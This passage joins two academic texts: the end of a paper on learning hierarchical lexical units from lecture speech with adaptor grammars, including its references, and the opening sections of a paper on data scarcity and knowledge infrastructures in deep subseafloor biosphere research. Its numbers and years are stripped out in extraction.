examples and qualitative analyses. to provide intuition about the model behavior, we present several examples and qualitative analyses. figure illustrates the model's representation of two words which appeared frequently in the economics lecture: globalization and collaboration. the figure shows (i) the bottom-layer plus which the model assigned to three instances of each word in the training corpus, (ii) the alignments between these bottom-layer plus and the top-layer plu sequence corresponding to the model's lexical representation of each word, (iii) the decomposition of each word-like unit into sub-word-like units, which are denoted as bracketed sequences of plus, and (iv) a hand-annotated phonemic transcription.

figure : the bottom-layer plus ~v and the top-layer plus u as well as the word-internal structure that the fulldp system discovered for three instances of the words (a) globalization and (b) collaboration. we also include phoneme transcriptions (derived by manual inspection of spectrograms), for clarity.
the first thing to note is the importance of the noisy-channel component in normalizing variation across word tokens. in figure -(a) the model has inferred a different sequence of bottom-layer plus for each spoken instance of globalization. plus which vary between the three instances are highlighted in red. the model was able to map these units to the single sequence of top-layer plus associated with the lexical item. similar remarks hold for the word collaboration in figure -(b). this suggests that acoustic variability between segments led the model to infer different bottom-layer plus between word tokens, but this variability was correctly normalized by the noisy-channel component.

the second thing to note is the large amount of variability in the granularity of stored sub-word-like units (bracketed plu sequences). the model allows sub-word-like units to consist of any sequence of plus, without further constraint. the figure shows that the model makes use of this flexibility, representing linguistic structure at a variety of different scales. for example, the initial sub-word-like unit of collaboration groups together two plus corresponding to a single phoneme /k/. other sub-word-like units correspond to syllables. still others capture morphological structure. for example, the final sub-word-like unit in both words (highlighted in green) corresponds to the combination of suffixes -ation, a highly productive unit in english (o'donnell, ). the reader may notice that the lexical representations are missing a final /n/ phoneme. (manual examination of spectrograms revealed two likely reasons for this. first, the final plu is likely to be a nasalized variant of /@/, thus encoding some portion of the following /n/ phoneme. second, across these word instances there is a great deal of acoustic variation between the acoustic realizations of the consonant /n/. it is unclear at present whether this variation is systematic, e.g., co-articulation with the following word, or simply noise.)

lexical units also exhibit variability in granularity. table shows a subset of lexical units discovered by the fulldp system for the economics lecture. each entry in the table shows (i) the decomposition of each word-like unit into sub-word-like units, (ii) a phonemic transcription of the unit, and (iii) the number of times each lexical unit was used to label a segment of speech in the lecture (denoted as |word|).

table : a subset of the lexical units that the fulldp system discovers for the economics lecture; the number of independent speech segments associated with each lexical unit is denoted as |word|. the entries include sub-word units such as /iy l iy/ (really, willy, billion), /ey sh ax n/ (innovation, imagination), and /ax bcl ax l/ (able, cable, incredible), single words such as discovered, individual, and powerful, and multi-word units such as open university and the arab muslim world, each decomposed into bracketed sub-word-like units.

the lexical units displayed in the table correspond, for the most part, to linguistic units. while there are a few cases, such as /iy l iy/, where the model stored a sequence of phones which does not map directly onto a linguistic unit such as a syllable, morpheme, or word, most stored units do correspond to intuitively plausible linguistic constituents. however, like sub-word-like units, there is variability in the scale of the linguistic structure which they capture. on one hand, the model stores a number of highly reusable smaller-than-word units, which typically correspond to morphemes or highly frequent syllables. for example, the sequences /ax bcl ax l/ and /ey sh ax n/ correspond to the productive suffix -able and the suffix combination -ation (o'donnell, ). on the other hand, the model also stores lexical units which correspond to words (e.g., powerful) and multi-word collocations (e.g., the arab muslim world).

figure shows an analysis of stored lexical units for each lecture, plotting the proportion of stored items which map onto sub-words, words, and multi-word collocations for each.

figure : the proportions of the word tokens the fulldp system generates for each lecture that map to sub-words, single words, and multi-words.

why does the model choose to store some units and not others? like many approaches to lexicon learning (goldwater, ; de marcken, c; johnson et al., ), our model can be understood as balancing a tradeoff between productivity (i.e., computation) and reuse (i.e., storage). the model attempts to find a set of lexical units which explain the distribution of forms in the input, subject to two opposing simplicity biases. the first favors smaller numbers of stored units. the second favors derivations of observed utterances which use fewer computational steps (i.e., a small number of lexical items). these are opposing biases. storing larger lexical units, like the arab muslim world, leads to simpler derivations of individual utterances, but a larger lexicon. storing smaller lexical units, like the suffix -able, leads to a more compact lexicon, but more complex derivations of individual utterances.

smaller units are favored when they are used across a large variety of relatively infrequent contexts. for example, -ation appears in a large number of input utterances, but often as part of words which are themselves relatively infrequent (e.g., conversation, reservation, innovation, and foundation). larger units will be favored when a combination of smaller units appears more frequently than would be predicted by considering their probabilities in isolation. for example, the model stores the words globalization and collaboration in their entirety, despite also storing the suffix combination -ation; these words occur in the lecture a greater number of times than would be expected merely by considering the words' sub-parts. thus, the fact that the model stores a variety of lexical units at different granularities is expected.

conclusion and future work

in this paper, we have presented a probabilistic framework for inferring hierarchical linguistic structures from acoustic signals. our approach is formulated as an integration of adaptor grammars, a noisy-channel model, and an acoustic model. comparison of the model with lesioned counterparts suggested that our model takes advantage of synergistic interactions between phonetic and lexical representations. the experimental results also indicate that modeling phonetic variability may play a critical role in inferring lexical units from speech. while the noisy-channel model has demonstrated an ability to normalize phonetic variations, it has its limitations.
in the future, we plan to investi- gate alternatives that more accurately capture pho- netic variation. we also plan to explore grammars that encode other types of linguistic structures such as collocation of lexical and morphological units. acknowledgements the authors would like to thank the anonymous re- viewers and the action editor of this paper, eric fosler-lussier, for helpful comments. furthermore, the authors would also like to thank mark johnson for making his implementation of adaptor grammars publicly available and for answering detailed ques- tions about the model and his implementation. references guillaume aimetti. . modelling early language ac- quisition skills: towards a general statistical learning mechanism. in proceedings of eacl: student re- search workshop, pages – . shlomo argamon, navot akiva, amihood amir, and oren kapah. . efficient unsupervised recursive word segmentation using minimum description length. in proceedings of the th international conference on computational linguistics. m bacchiani and m ostendorf. . joint lexicon, acoustic unit inventory and model design. speech communication, ( ): – . benjamin börschinger and mark johnson. . explor- ing the role of stress in bayesian word segmentation using adaptor grammars. transactions of acl, : – . michael r. brent. a. an efficient, probabilistically sound algorithm for segmentation and word discovery. machine learning, : – . michael r. brent. b. speech segmentation and word discovery: a computational perspective. trends in cognitive sciences, ( ): – , august. timothy a. cartwright and michael r. brent. . segmenting speech without a lexicon: evidence for a bootstrapping model of lexical acquisition. in pro- ceedings of the th annual meeting of the cognitive science society. siddhartha chib and edward greenberg. . un- derstanding the metropolis-hastings algorithm. the american statistician, ( ): – . cheng-tao chung, chun-an chan, and lin-shan lee. . unsupervised discovery of linguistic structure including two-level acoustic patterns using three cas- caded stages of iterative optimization. in proceedings of icassp, pages – . mathias creutz and krista lagus. . unsupervised models for morpheme segmentation and morphology learning. acm transactions on speech and language processing, ( ). steven b. davis and paul mermelstein. . com- parison of parametric representations for monosyllabic word recognition in continuously spoken sentences. ieee transactions on acoustics, speech, and signal processing, ( ): – . carl de marcken. a. linguistic structure as com- position and perturbation. in proceedings of the th annual meeting on association for computational lin- guistics, pages – . association for computa- tional linguistics. carl de marcken. b. the unsupervised acquisition of a lexicon from continuous speech. technical report ai-memo- , cbcl-memo- , massachusetts in- stitute of technology artificial intelligence labora- tory. carl de marcken. c. unsupervised language ac- quisition. ph.d. thesis, massachusetts institute of technology. micha elsner, sharon goldwater, naomi feldman, and frank wood. . a joint learning model of word segmentation, lexical acquisition, and phonetic vari- ability. in proceedings of emnlp, pages – . t.s. ferguson. . a bayesian analysis of some non- parametric problems. ann. statist, ( ): – . jenny rose finkel, christopher d. manning, and an- drew y. ng. . solving the problem of cascading errors: approximate bayesian inference for linguistic annotation pipelines. 
in proceedings of the confer- ence on empirical methods in natural language pro- cessing (emnlp), pages – . michael c. frank, sharon goldwater, thomas l. grif- fiths, and joshua b. tenenbaum. . modeling human performance in statistical word segmentation. cognition, ( ): – . michael c. frank, joshua b. tenenbaum, and edward gibson. . learning and long-term retention of large-scale artificial languages. public library of sci- ence (plos) one, ( ). james glass, timothy j. hazen, lee hetherington, and chao wang. . analysis and processing of lecture audio data: preliminary investigations. in proceedings of the workshop on interdisciplinary approaches to speech indexing and retrieval at hlt-naacl, pages – . james glass. . a probabilistic framework for segment-based speech recognition. computer speech and language, : – . john goldsmith. . unsupervised learning of the morphology of natural language. computational lin- guistics, ( ): – . john goldsmith. . an algorithm for the unsuper- vised learning of morphology. natural language en- gineering, ( ): – . sharon goldwater, thomas l. griffiths, and mark john- son. . a bayesian framework for word segmen- tation: exploring the effects of context. cognition, : – . sharon goldwater. . nonparametric bayesian mod- els of lexical acquisition. ph.d. thesis, brown uni- versity. joshua t. goodman. . parsing inside-out. ph.d. thesis, harvard university. zellig harris. . from phoneme to morpheme. lan- guage, ( ): – . jahn heymann, oliver walter, reinhold haeb-umbach, and bhiksha raj. . unsupervised word seg- mentation from noisy input. in proceedings of asru, pages – . ieee. aren jansen, kenneth church, and hynek hermansky. . towards spoken term discovery at scale with zero resources. in proceedings of interspeech, pages – . aren jansen, emmanuel dupoux, sharon goldwater, mark johnson, sanjeev khudanpur, kenneth church, naomi feldman, hynek hermansky, florian metze, richard c. rose, et al. . a summary of the jhu clsp workshop on zero resource speech tech- nologies and models of early language acquisition. in icassp, pages – . frederick jelinek. . continuous speech recogni- tion by statistical methods. proceedings of the ieee, : – . mark johnson and katherine demuth. . unsu- pervised phonemic chinese word segmentation using adaptor grammars. in proceedings of coling, pages – , august. mark johnson and sharon goldwater. a. improving nonparameteric bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. in human language technologies: the annual conference of the north american chapter of the acl, pages – . mark johnson and sharon goldwater. b. improving nonparameteric bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. in proceedings of naacl-hlt, pages – . mark johnson, thomas l. griffiths, and sharon goldwa- ter. . adaptor grammars: a framework for speci- fying compositional nonparametric bayesian models. in advances in neural information processing sys- tems, pages – . mark johnson, thomas l. griffiths, and sharon goldwa- ter. . bayesian inference for pcfgs via markov chain monte carlo. in proceedings of naacl, pages – . mark johnson. a. unsupervised word segmentation for sesotho using adaptor grammars. in proceedings of the tenth meeting of acl special interest group on computational morphology and phonology, pages – , columbus, ohio, june. mark johnson. b. using adaptor grammars to iden- tify synergies in the unsupervised acquisition of lin- guistic structure. 
in proceedings of acl, pages – . brenden m. lake, chia-ying lee, james r. glass, and joshua b. tenenbaum. . one-shot learning of generative speech concepts. in proceedings of the th annual meeting of the cognitive science soceity. karim lari and steve j. young. . the estimation of stochastic context-free grammars using the inside- outside algorithm. computer speech & language, ( ): – . chia-ying lee and james glass. . a nonparamet- ric bayesian approach to acoustic model discovery. in proceedings of acl, pages – . chia-ying lee, yu zhang, and james glass. . joint learning of phonetic units and word pronunciations for asr. in proceedings of the conference on empirical methods on natural language processing (emnlp), pages – . chia-ying lee. . discovering linguistic structures in speech: models and applications. ph.d. thesis, massachusetts institute of technology. percy liang, slav petrov, michael i. jordan, and dan klein. . the infinite pcfg using hierarchical dirichlet processes. in processing of emnlp, pages – . fergus r. mcinnes and sharon goldwater. . un- supervised extraction of recurring words from infant- directed speech. in proceedings of cogsci, pages – . daichi mochihashi, takeshi yamada, and naonori ueda. . bayesian unsupervised word segmentation with nested pitman-yor language modeling. in proceed- ings of acl, pages – . graham neubig, masato mimura, and tatsuya kawa- hara. . bayesian learning of a language model from continuous speech. the ieice transactions on information and systems, ( ): – . timothy j. o’donnell. . productivity and reuse in language: a theory of linguistic computation and storage. the mit press, cambridge, massachusetts and london, england. d. c. olivier. . stochastic grammars and language acquisition mechanisms. ph.d. thesis, harvard uni- versity. alex s. park and james r. glass. . unsupervised pattern discovery in speech. ieee transactions on acoustics, speech, and signal processing, ( ): – . jim pitman and marc yor. . the two-parameter poisson-dirichlet distribution derived from a stable subordinator. the annals of probability, pages – . jim pitman. . the two-parameter generalization of ewens’ random partition structure. technical re- port, department of statistics university of california berkeley. jennifer r. saffran, richard n. aslin, and elissa l. new- port. a. statistical learning by -month-old in- fants. science, ( ): – , december. jennifer r. saffran, elissa l. newport, and richard n. aslin. b. word segmentation: the role of dis- tributional cues. journal of memory and language, : – . odette scharenborg, vincent wan, and mirjam ernestus. . unsupervised speech segmentation: an analy- sis of the hypothesized phone boundaries. journal of the acoustical society of america, : – . yaodong zhang and james glass. . unsuper- vised spoken keyword spotting via segmental dtw on gaussian posteriorgrams. in proceedings of asru, pages – . yaodong zhang, ruslan salakhutdinov, hung-an chang, and james glass. . resource configurable spoken query detection using deep boltzmann machines. in proceedings of icassp, pages – . yaodong zhang. . unsupervised speech processing with applications to query-by-example spoken term de- tection. ph.d. thesis, massachusetts institute of tech- nology. submitted march accepted october published november corresponding author peter t. darch, ptdarch@illinois.edu academic editor sally jo cunningham additional information and declarations can be found on page doi . /peerj-cs. 
ship space to database: emerging infrastructures for studies of the deep subseafloor biosphere

peter t. darch and christine l. borgman
school of information sciences, university of illinois at urbana-champaign, urbana-champaign, il, united states
information studies, university of california, los angeles, ca, united states

abstract

background. an increasing array of scientific fields face a ''data deluge.'' however, in many fields data are scarce, with implications for their epistemic status and ability to command funding. consequently, they often attempt to develop infrastructure for data production, management, curation, and circulation. a component of a knowledge infrastructure may serve one or more scientific domains. further, a single domain may rely upon multiple infrastructures simultaneously. studying how domains negotiate building and accessing scarce infrastructural resources that they share with other domains will shed light on how knowledge infrastructures shape science.

methods. we conducted an eighteen-month, qualitative study of scientists studying the deep subseafloor biosphere, focusing on the center for dark energy biosphere investigations (c-debi) and the integrated ocean drilling program (iodp) and its successor, the international ocean discovery program (iodp ). our methods comprised ethnographic observation, including eight months embedded in a laboratory, interviews (n= ), and document analysis.

results. deep subseafloor biosphere research is an emergent domain. we identified two reasons for the domain's concern with data scarcity: limited ability to pursue their research objectives, and the epistemic status of their research. domain researchers adopted complementary strategies to acquire more data. one was to establish c-debi as an infrastructure solely for their domain. the second was to use c-debi as a means to gain greater access to, and reconfigure, iodp/iodp to their advantage. iodp/iodp functions as infrastructure for multiple scientific domains, which creates competition for resources. c-debi is building its own data management infrastructure, both to acquire more data from iodp and to make better use of data, once acquired.

discussion. two themes emerge. one is data scarcity, which can be understood only in relation to a domain's objectives. to justify support for public funding, domains must demonstrate their utility to questions of societal concern or existential questions about humanity. the deep subseafloor biosphere domain aspires to address these questions in a more statistically intensive manner than is afforded by the data to which it currently has access. the second theme is the politics of knowledge infrastructures. a single scientific domain may build infrastructure for itself and negotiate access to multi-domain infrastructure simultaneously. c-debi infrastructure was designed both as a response to scarce iodp/iodp resources, and to configure the data allocation processes of iodp/iodp in their favor.
subjects human-computer interaction, digital libraries keywords knowledge infrastructures, scientific data, microbiology, long tail, big science, little science, big data, little data, cyberinfrastructure, data infrastructure introduction the array of scientific fields facing a ‘‘data deluge’’ has grown rapidly in the years since the term was coined (hey & trefethen, , p. ). new instruments are capable of collecting data at greater volume, variety, and velocity than ever before. consequences of these developments include the emergence of new infrastructures, changes in epistemologies, and new forms of collaborative work (kitchin, ; leonelli, ). however, in many fields data are scarce and hard won (borgman, ; kitchin & lauriault, ); their problem is the opposite of ‘‘big data.’’ domains suffering data scarcity may have lower epistemic status than those enjoying ‘‘data wealth’’ (sawyer, , p. ). consequently, they may attempt to increase their resources by developing better infrastructure to produce, manage, curate, and circulate the data they do have. we examine how a community of researchers studying the deep subseafloor biosphere experiences data scarcity, and how they develop knowledge infrastructures to address this scarcity. this scientific domain experiences acute data scarcity because it aspires to address questions of societal concern and existential questions about humanity in a more statistically intensive manner than is presently possible. two infrastructures have been critical to this community’s development (darch & sands, ). one was established long before the emergence of the deep subseafloor biosphere as a topic of scientific study and is shared with other domains. this is the integrated ocean drilling program (iodp, – ) and its successor, the international ocean discovery program (iodp , from ), an international organization that conducts scientific ocean drilling cruises on behalf of scientists studying physical and biological phenomena related to the seafloor (international ocean discovery program, ). the second infrastructure is specific to the deep subseafloor biosphere, namely the center for dark energy biosphere investigations, or c-debi (edwards, ). we explore the relationships between iodp/iodp infrastructure and c-debi infrastructure. multiple domains compete for the scarce infrastructural resources of iodp/iodp , such as space on drilling cruises for people and equipment, cores that are acquired on those cruises, and the work of data analysts and curators employed by iodp/iodp . the features of c-debi, including its structure, modes of providing financial support for researchers, and its data infrastructure, are designed to enable deep subseafloor biosphere researchers to do the following: . exploit existing iodp/iodp resources allocated to deep subseafloor biosphere research; and . make more effective interventions in the inter-domain politics of iodp/iodp infrastructure, thereby securing a greater share of iodp/iodp resources for their community. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. many scientific fields rely on both single- and multi-domain infrastructure, thus our findings apply to infrastructure far beyond the subseafloor biosphere domain. background and research questions in this section we introduce our research questions with a review of relevant literature. 
first we frame the concept of knowledge infrastructures, exploring how they develop, support, and constrain scientific practice. we consider the interaction between infrastructure specific to a single domain and infrastructure shared between domains. second, we discuss how and why the availability of data is a critical concern in science, with attention to how domains address data scarcity. third, we present more background on deep subseafloor biosphere research to explain why this scientific domain is an ideal site to study the interaction of knowledge infrastructures. knowledge infrastructures the term infrastructure is often used in reference to large-scale systems with multiple social and technical components that provide services, resources, and facilities (edwards et al., ). infrastructures, in the senses used herein, are ‘‘best understood as ecologies or complex adaptive systems’’ (borgman, , p. ). infrastructures are complex in the sense that they comprise multiple systems that may have been devised, built, and configured by different actors with varying objectives, but which function together. they are continuously adaptive in the sense that components change or are introduced (edwards et al., ). a particular type of infrastructure is ‘‘knowledge infrastructures,’’ which edwards ( , p. ) defined as ‘‘robust networks of people, artifacts, and institutions that generate, share, and maintain specific knowledge about the human and natural worlds.’’ infrastructure is a ‘‘fundamentally relational concept’’ in the sense that a sociotechnical configuration ‘‘becomes infrastructure in relation to organized practices’’ (star & ruhleder, , p. ). from the point of view of a particular domain, what is considered to be a knowledge infrastructure is precisely those configurations of social and technical components that provide resources to support a community’s shared objectives and practices. indeed, as a domain’s interests and practices change, the knowledge infrastructure must adapt if the domain is to remain relevant (ribes & polk, ). single vs. multi-domain infrastructures in some instances, a component of a knowledge infrastructure may serve one scientific domain alone. in other cases, a component serving one scientific domain may also serve as part of a knowledge infrastructure for others. over time, these relationships tend to shift, re- quiring both infrastructures and domains to adapt, sometimes willingly, sometimes less so. the large synoptic survey telescope (lsst), a telescope under construction with a projected budget of $ . billion, is an important example of a multi-domain infrastructure. lsst promises to provide data unprecedented in scale and scope for multiple domains within astronomy (lsst science collaboration et al., ). the process of building lsst requires negotiation between domains on decisions such as how to allocate scarce observing time during the planned ten years of data collection. this multiple-domain infrastructure, darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in turn, interacts with infrastructures serving single domains within astronomy. these include the dark energy survey, and the gaia telescope, which focuses on the milky way (dark energy survey, ; european space agency et al., ). these single-domain infrastructures were planned and began operations after significant funds were invested in lsst. 
the sociotechnical configurations of each project are shaped by lsst and vice versa (european space agency et al., ; lsst science collaboration et al., ). the authors of this paper also are involved in a case study of lsst (borgman et al., ). examples abound of interactions between single- and multiple-domain knowledge infrastructures. one example is between infrastructure that serves researchers studying earthquakes in southern california only (southern california earthquake center , ) and infrastructure that serves multiple domains related to the formation of volcanoes in the continent of north america (earthscope, ). a second example is between infrastructure intended to support a single domain studying coastal dynamics and multi- domain infrastructure that collects and distributes data about oceans, coastal regions, and the us great lakes (center for coastal margin observation & prediction, ; noaa, ). domains sharing infrastructure while infrastructures that serve individual domains have received the most study, other important infrastructures span multiple, and often competing domains. domain-spanning infrastructures often represent significant investment of public research funding and are critical sources of data for the research communities they serve. among the few shared infrastructures receiving scholarly attention is argos, whose study by benson ( ) revealed how marine biologists were able to negotiate a share of its infrastructural resources. argos is a satellite-based environmental surveillance system that provides data for oceanography, meteorology, and marine biology (ortega, ). marine biologists persuaded argos leaders to collect data elements important to them by appealing to the interests of their commercial partners. in return, the biologists compromised other elements of their data collection methods to satisfy argos partners in oceanography and meteorology. another perspective on negotiations in shared infrastructure is offered by ribes & finholt ( ), in their study of building infrastructure for studying the water environment. the forerunner to this infrastructure served a single community of researchers in environmental engineering, but the new infrastructure was intended to serve hydrological scientists as well. ribes and finholt show that the spokespeople of these domains negotiate infrastructure building more effectively when they represent a strong, clearly defined, and cohesive community. various mechanisms for defining, canvassing the opinions of, and representing a community—such as organizing forums and conducting surveys—play an important role in facilitating these spokespeople’s effectiveness. unfortunately, the effort to build this infrastructure fell apart before it began scientific operations (jackson & buyuktur, ). these studies suggest the importance of studying how domains negotiate processes of building and accessing infrastructural resources shared with other domains, and how the configurations of these infrastructures shape the work and organization of individual communities. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data scarcity and abundance as science became more professionalized in the early twentieth century, more emphasis was placed on mathematical methods. these methods, in turn, require data generation and statistical confirmation (bowler & morus, ). 
that shift in focus endowed science with greater cultural authority as the primary knowledge-generating institution within society (porter, ). the tight coupling of mathematization, data, and cultural authority helps to explain why domains that experience data scarcity are often so concerned with increasing their volume of data (sawyer, ). for example, in molecular biology, increasing quantification and statistical inference were driven by ‘‘an ever-present methodological anxiety manifested in the constant search for an increased objectivity –or in its converse: the avoidance of subjectivity’’ (italics in original). these methodological changes both require and accommodate increasing quantities of data (suárez-díaz, & anaya-munoz, , p. ). by increasing quantification and data-intensive practices, communities can increase their scientific credibility (hagen, ; kay, ). indeed, this increasing quantification frequently shapes, and is shaped by, hypothesis testing with laboratory-generated data (lenoir, ; paul, ). least studied are situations where ‘‘no data’’ exist, whether because no data were collected about a particular phenomenon, data may have existed but were not curated for longer term use, or data still exist but cannot be discovered or retrieved for a variety of reasons (borgman, ). increasing data production social mechanisms can encourage greater production of data and use of statistical methods. as domains develop norms that promote data-intensive research, those who eschew such approaches may be marginalized (keller, ). a domain’s quest for enhanced status may drive changes at the institutional level, even leading to the development of new domains. natural historians in the early th century, in the face of profound challenges to their domain’s status, made alliances with the more data-intensive and mathematically based discipline of population genetics, forming the new discipline of evolutionary biology (ceccarelli, ). domains sometimes address scarcity by producing large volumes of data. a notable example is cosmology, traditionally regarded as the poor relation to other domains of study in astronomy (such as lunar and solar astronomy) because they lacked sufficient data to support fundamental conjectures (kragh, ). cosmologists’ concern with this lowly status motivated the emergence of large telescope projects, known as sky surveys, that collect vast quantities of data about astronomical phenomena (sloan digital sky survey, ). cosmology is now characterized by the use of data-intensive statistical methods (strauss, ). similarly, molecular biology addressed data scarcity by developing the human genome project (lenoir & hays, ). gaining access to extant data one way for a domain to address its data scarcity is to negotiate access to extant infrastructures, which often occurs in parallel with adopting computational- and data- intensive epistemologies (chow-white & garcía-sancho, ). scientific databases are a darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. means to organize and classify information, providing ‘‘a contemporary key to both state and scientific power’’ (bowker, , p. ). infrastructure projects, in turn, may increase data production and circulation by shaping the behavior of scientists. interoperability strategies include imposing or embedding common standards, such as what counts as reliable evidence, acceptable research methods, and data management practices (bowker, ; leonelli & ankeny, ). 
infrastructure can also foster norms of behavior that encourage greater openness within a scientific community, including openness around data (leonelli, ). contributions to a database can, in turn, encourage greater willingness to contribute to a database, resulting in a self-reinforcing cycle of increased data availability and normative shifts towards greater data openness. databases can help encourage the circulation of types of data that the database does not support by creating expectations that scientists will share data when asked (leonelli & ankeny, ). kelty ( ) discusses how scientific newsletters in biology not only constituted an infrastructure to build communities around particular organisms, but also promoted sharing of research objects by requiring openness of researchers as a condition of receiving the newsletter (and thus continued membership of the community). lastly, and perhaps most importantly for knowledge infrastructures, is to address scarcity by building infrastructure that aggregates extant data or databases (meyer, ), or that integrates existing sites of data production into a single infrastructure (aronova, baker & oreskes, ). these databases play critical roles in supporting research and in fostering data-intensive methods (bowker, ; leonelli, ). one example is the long term ecological research network, whose infrastructure attempts to improve the management and accessibility of data produced by distributed ecological research stations. this network originated in the efforts of biologists to leverage ‘‘big science’’ funding opportunities by collecting and organizing large-scale datasets (aronova, baker & oreskes, ). however, a major barrier to data circulation and integration is the use of disparate standards by individual scientists, a problem particularly acute when scientists come from different disciplines or communities of practice (baker, jackson & wanetick, ; bietz & lee, ; borgman et al., ; borgman et al., ). scientists’ concerns about control of data, authorship rights, and incentives to undertake the work necessary to make their data shareable also limit the adoption of these infrastructures (borgman, ; borgman, wallis & enyedy ). research questions data scarcity is a critical problem for many scientific communities. much richer accounts are needed of how domains employ infrastructural approaches to data scarcity. one approach is to emphasize scarce resources when negotiating access to infrastructure. as discussed above, competition arises when an infrastructure attempts to accommodate all types and forms of data present in the participating communities, particularly in the face of conflicting data standards and formats. a second approach is to consider relationships between an infrastructure and others with which it overlaps. a single domain may rely upon multiple infrastructures simultaneously. a domain that builds an infrastructure to increase its flow of data may be expressing dissatisfaction with the existing infrastructure. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. new infrastructure is likely to address the shortcomings and exploit affordances of existing infrastructures. these considerations motivate our three research questions: ( ) how do scientific domains experience data scarcity? ( ) how does a scientific domain address data scarcity through developing knowledge infrastructures? 
( ) what interactions occur between infrastructure specific to a domain and infrastructure shared with other domains? deep subseafloor biosphere research studies of the deep subseafloor biosphere draw together scientists from multiple physical and life science backgrounds who bring a wide variety of perspectives, tools, and methods (darch et al., ). researchers pursue their scientific goals by collecting and analyzing rocks from the seafloor, known as cores. their work involves data about the microbial communities in these cores and the core’s physical properties, such as geochemical or hydrological. scientific ocean drilling cruises are the primary source of cores for this community. from to , the integrated ocean drilling program (iodp) operated these cruises. scientific studies of the oceans receive extensive financial support from governments. as mukerji ( ) argues, this support depends on the ability of oceanographic research to address questions of major social and political concern. such concerns can include national defense, environmental issues, fisheries, and more recently, telecommunications. thus, in , us government support for scientific ocean drilling led to the international ocean discovery program (iodp ) as the replacement for iodp. iodp uses the same ships, drilling technologies, and other resources as iodp, and provides infrastructure for many scientific domains, including plate tectonics. the center for dark energy biosphere investigations (c-debi) is a science and technology center (stc) funded by the us national science foundation (nsf), and launched in september . c-debi was initially funded for five years, and successfully renewed for an additional five years ( – ). c-debi, which provides infrastructure for deep subseafloor biosphere researchers, has two main aims. one is to foster a community of researchers to study deep subseafloor microbial life, and the second is to promote scientific work on microbial ecology of the seafloor. this scientific work explores the role of subseafloor microbes in global environmental processes to improve knowledge of the origin, evolution, and extent of life on earth. these researchers are geographically distributed, with the principal investigator (pi) and four co-pis based at five universities across the us. c-debi funding covers projects conducted by over scientists in more than universities and research institutions across the usa, europe, and asia (center for dark energy biosphere investigations, ). c-debi was established before the nsf’s requirements for data management plans, which began with proposals submitted in (national science foundation, ). however, c-debi was required to develop a plan for its renewal application in (center for dark energy biosphere investigations, a). by this time, senior personnel in darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. c-debi had become more aware of the inter-domain politics in iodp/iodp , having participated in expeditions during and . in response to this awareness, and to requirements for a data management plan, the process of constructing infrastructure for scientific data management in c-debi began. thus, c-debi is itself a knowledge infrastructure for the domain of deep subseafloor biosphere research and c-debi has responsibility for developing further infrastructure components. 
our focus in this article is the relationships between the iodp/iodp infrastructure and the c-debi infrastructure, and the influence of data scarcity or abundance. our account pays attention to these relationships in the period up to c-debi’s renewal in summer , although work on infrastructure continues. we highlight the critical role of negotiations between scientific domains as they contest scarce infrastructural resources. single-domain infrastructures are both a response to, and an intervention in, these negotiations. our study advances research on interactions between representatives of different domains (such as in formal meetings, and informal encounters), and as domains build infrastructures for themselves. we also advance research on the motivations for domains to build infrastructure for themselves by examining how such infrastructure is configured to leverage and intervene in the control of shared infrastructure. analyzing this process, therefore, provides a valuable opportunity to understand the relationships between single- and multi-domain infrastructure, and is part of a larger study of knowledge infrastructures at multiple scientific sites (borgman et al., ). research methods we present findings from an eighteen-month, qualitative case study of scientists studying the deep subseafloor biosphere by focusing on c-debi and the ocean drilling programs on which it depends, the integrated ocean drilling program (iodp) and its successor, the international ocean discovery program (iodp ). this community affords rich opportunities for answering our research questions, enabling us to explore relationships between c-debi and iodp/iodp ; to ask how and why scientists engage in building, configuring, and negotiating these infrastructures to access data; and how the scarce resources of iodp/iodp are contested between multiple domains. our human subjects research was approved by the ucla north general institutional review board (# - -cr- ). data collection a key feature of this case study is long-term ethnographic observation of c-debi (hammersley & atkinson, ). we were embedded for eight months in a laboratory headed by a leading figure in c-debi at a large us research university, which involved one of the authors visiting the laboratory for two or three days per week to observe bench work and laboratory meetings. the first author also conducted weeklong observational work in two other participating laboratories in the us and joined researchers on a three-day field research expedition. we made extensive notes about what we observed, including the physical layout of the laboratories and laboratory benches, tools and methods used, and darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. patterns of collaboration. our informants told us about their backgrounds, aspirations, and experiences in the laboratories and on scientific cruises. these organizations are distributed across multiple institutions and countries, which posed issues of scalability for the researcher (star, ). the work of c-debi and iodp/iodp spans more sites than a small team of researchers can visit, much less meet face-to-face with all personnel. we focused on the techniques and technologies—the ‘‘scalar devices’’—employed by our research subjects to understand c-debi, iodp/iodp , and their domain (ribes, , p. ). one scalar device that we observed was gatherings such as the c-debi all-hands’ meeting and research workshops. 
a larger gathering was the american geophysical union fall meeting in san francisco, a major conference for the deep subseafloor biosphere community and iodp/iodp ; we also presented our early findings at this conference. these events enabled our research subjects to take stock of the scale of the communities and infrastructures in which they are embedded, in terms of the people involved, organizational hierarchies, and the range of scientific work conducted. another form of scalar devices is reports and workplans, which we studied as part of document analysis (see below). the distributed nature of c-debi and iodp/iodp also means that work in these organizations often takes place through communications media. by using multiple forms of media, we could establish ‘‘co-presence’’ when ‘‘co-location’’ was not possible (beaulieu, ). co-presence involves the researcher witnessing how the work of scientific collaborations is conducted even when they are not physically (or necessarily temporally) collocated with the subjects of research. lacking the opportunity to observe practices on board an iodp cruise, given the expense and limited places available, we studied iodp work conducted elsewhere. we attended online meetings and seminars where participation and data collection were planned, and watched a feature-length documentary that used footage from a deep subseafloor biosphere-focused cruise. other online observations included workshops, meetings where key c-debi personnel planned infrastructure to coordinate data management across the project, and websites of organizations and people. we assembled a corpus of documents for analysis. documents such as instruction manuals for laboratory equipment help to explain the work conducted by c-debi- affiliated scientists in their laboratories. other documents help us to interpret contexts in which c-debi scientists operate. these include official c-debi documents such as the funding proposal, annual reports 